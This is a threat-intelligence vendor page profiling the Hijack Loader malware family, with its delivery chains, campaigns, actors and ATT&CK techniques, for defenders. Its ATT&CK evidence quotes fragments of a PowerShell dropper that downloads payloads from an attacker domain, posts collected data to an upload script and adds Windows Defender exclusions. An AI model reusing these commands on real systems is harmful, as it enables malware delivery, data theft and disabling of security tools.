Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to malware
MalwareRansomwareUsed by 2 actors

Hijack Loader

Hijack Loader is a modular Windows malware loader used as a conduit for additional payloads, including information stealers and remote access trojans. The content explicitly identifies it as also known as DOILoader and IDAT Loader. It is described as a stage-1 downloader or payload enabler and has been observed reconstructing payloads in memory, decrypting embedded data, injecting shellcode into newly spawned processes, and deploying follow-on malware via process injection, including Remcos RAT into the legitimate Chime.exe process.

Observed delivery vectors include malicious PowerShell downloaders, ClickFix-style social engineering, compromised websites, SEO poisoning, malvertising, fake software installers, pirated or cracked software lures, MSI installers, ZIP archives containing LNK files, and abuse of platforms such as YouTube and Viber. In one documented chain, a PowerShell script from fancysunshine[.]top downloaded RD.zip, extracted it under %TEMP% into fake Chrome cache folders, and executed S-D.exe; the payload in RD.zip was identified as Hijack Loader. That script also added Windows Defender exclusions for C:\ and for MicrosoftEdgeUpdate.exe and SecurityHealthSystray.exe, collected the victim external IP and username, checked for a scheduled task named MSSecurity, exfiltrated result.txt to upload.php on fancysunshine[.]top, and cleaned up downloaded artifacts.

The malware appears across multiple criminal delivery ecosystems and campaigns. ClearFake campaigns delivered Hijack Loader to Windows systems alongside Amadey and IDAT Loader. Microsoft reported Storm-3075-related AI-themed malvertising and other campaigns distributing Hijack Loader alongside Lumma Stealer and Oyster. SEO poisoning campaigns used fake Cloudflare CAPTCHA pages and ClickFix to drop RedLine Stealer via Hijack Loader. Other observed chains used Hijack Loader to deploy Lumma Stealer, Atomic Stealer, Vidar Stealer, Rhadamanthys, RedLine Stealer, ACR Stealer, and Remcos RAT. RenEngine Loader has been reported decrypting, staging, and transferring execution to Hijack Loader to enable flexible downstream payload deployment.

Associated threat activity in the content includes Russia-aligned UAC-0184 / Hive0156 targeting Ukrainian military and government entities via Viber-delivered ZIP archives with malicious LNK files. In that campaign, PowerShell, DLL side-loading, module stomping, in-memory payload reconstruction, scheduled-task persistence, and security-product checks were used before Hijack Loader launched Remcos RAT. GrayBravo activity also includes distribution of Hijack Loader through the CastleLoader ecosystem. The malware was also specifically named as a target of the May 2025 Operation Endgame action.

High-confidence indicators and artifacts mentioned in the content include fancysunshine[.]top, Add.ps1, RD.zip, S-D.exe, %TEMP%/chrome_BITS_5484_11223155, %TEMP%/chrome_BITS_5484_11123155, upload.php, result.txt, deleter.ps1, smoothieks.zip, and abuse of legitimate executables such as CFlux.exe and Chime.exe in side-loading and injection chains.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Storm-3075

While the example campaign described in this section delivered Vidar Stealer, we have also observed this campaign distributing Lumma Stealer, Hijack Loader, and Oyster.

via microsoft generalmicrosoft.com
Greedy Sponge

Credential Theft and Remote Access Surge as AllaKore, PureRAT, and Hijack Loader Proliferate

via cloudatg insightscloudatg.com
MITRE ATT&CK

Techniques & procedures

18 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583Acquire InfrastructureEvidence1

Since at least early 2026, Microsoft Threat Intelligence has observed malvertising campaigns that use AI-themed terms such as “Awesome AI Windows Plugin” and “Flux Pro AI” in social engineering lures ... Microsoft attributes this malvertising activity to an initial access broker and malware distributor tracked as Storm-3075.

T1583.008MalvertisingEvidence1

“creates a throwaway GitHub account and forks… edits the download link… used sponsored ads… to promote their commit… deliver Hijack Loader and Atomic Stealer.”

Initial Access

1 technique
T1189Drive-by CompromiseEvidence4

Analysis of the redirection chain determined that the attack likely originated from free movie streaming sites. Infections on such sites typically begin when users interact with embedded movie players or click popups.

Execution

3 techniques
T1053.005Scheduled TaskEvidence1

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

T1059.001PowerShellEvidence1

During routine malware analysis, I discovered a PowerShell-based dropper script being delivered from a malicious C2 domain... This script disables security controls, fetches 2 payloads (SectopRAT, HiJack Loader), exfiltrates data, and removes all traces of its execution.

T1204User ExecutionEvidence2

Then S-D.exe is executed from each extracted directory.

Persistence

1 technique
T1053.005Scheduled TaskEvidence1

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

Privilege Escalation

1 technique
T1053.005Scheduled TaskEvidence1

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...

Stealth

5 techniques
T1027Obfuscated Files or InformationEvidence1

"distributed via a heavily obfuscated Inno Setup installer"; "Delivered via a downloader in a ZIP archive"; "illegally modified game installers distributed via piracy platforms"

T1036MasqueradingEvidence2

The archives contained a heavyweight Win32 PE that masqueraded as the DeepSeek installer.

T1070.004File DeletionEvidence1

Before exiting, the malware removes: All downloaded ZIPs and folders The exfiltrated result file Itself via a helper script deleter.ps1

T1497Virtualization/Sandbox EvasionEvidence1

"Hijack Loader incorporates an array of anti-virtual machine and anti-debug techniques"

T1497.001System ChecksEvidence1

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity, and writes results to a result.txt file.

Credential Access

1 technique
T1649Steal or Forge Authentication CertificatesEvidence1

The malware executable was signed with a fraudulently obtained Microsoft-issued code-signing certificate obtained through Artifact Signing... Microsoft attributes the signing service used by the threat actor to Fox Tempest.

Discovery

4 techniques
T1016System Network Configuration DiscoveryEvidence1

The malware collects the victim’s external IP address... $externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"

T1033System Owner/User DiscoveryEvidence1

The malware collects the victim’s external IP address and username... $username = $env:USERNAME

T1497Virtualization/Sandbox EvasionEvidence1

"Hijack Loader incorporates an array of anti-virtual machine and anti-debug techniques"

T1497.001System ChecksEvidence1

The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity, and writes results to a result.txt file.

Collection

1 technique
T1560Archive Collected DataEvidence1

The script uses Invoke-WebRequest to pull two ZIP archives from the same C2... Each ZIP is extracted to a fake Chrome cache folder inside %TEMP%.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence2

The script uses Invoke-WebRequest to pull two ZIP archives from the same C2... Invoke-WebRequest -URI https://fancysunshine[.]top/s8dj3bh9w877/NC.zip -outfile $file ... Invoke-WebRequest -URI https://fancysunshine[.]top/s8dj3bh9w877/RD.zip -outfile $file1

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Then, it exfiltrates the result via an HTTP POST to: https://fancysunshine[.]top/s8dj3bh9w877/upload.php Payload structure: multipart/form-data, with result.txt and a folder tag report.

Other

1 technique
T1562.001Disable or Modify ToolsEvidence2

The script attempts to evade detection by creating Windows Defender exclusions for the entire C drive and two known processes often abused in malware campaigns. Add-MpPreference -ExclusionPath $folderPath Add-MpPreference -ExclusionProcess $processName Add-MpPreference -ExclusionProcess $processName1

INDICATORS OF COMPROMISE

IOCs tracked for this family

8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
4 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
3 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app6 months ago
domain●●●●●●●●●●●●View more in app6 months ago
ip.v4●●●●●●●●●●●●View more in app6 months ago
domain●●●●●●●●●●●●View more in app1 year ago
hash.sha256●●●●●●●●●●●●View more in app1 year ago
uri●●●●●●●●●●●●View more in app1 year ago
ACTIVITY FEED

Recent activity

22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

22 SOURCESView more in app
malware newsNews
Jun 8, 2026
AI brands as bait: How threat actors are using the AI hype in social engineering - Malware News - Malware Analysis, News and Indicators

Loader malware observed as one of the payloads distributed through AI-themed malvertising campaigns.

Read more
microsoft generalNews
Jun 8, 2026
AI brands as bait: How threat actors are using the AI hype in social engineering | Microsoft Security Blog

Loader malware observed as one of the payloads distributed through AI-themed malvertising campaigns.

Read more
the hacker newsNews
Feb 26, 2026
ThreatsDay Bulletin: Kali Linux + Claude, Chrome Crash Traps, WinRAR Flaws, LockBit & 15+ Stories

Multi-stage loader delivered via a repo-squatting / Google Ads campaign (GPUGate) using a trojanized installer.

Read more
the hacker newsNews
Feb 15, 2026
Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

Secondary-stage loader used in RenEngine Loader campaigns to ultimately deploy Lumma Stealer.

Read more
+18 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching8

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping18

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.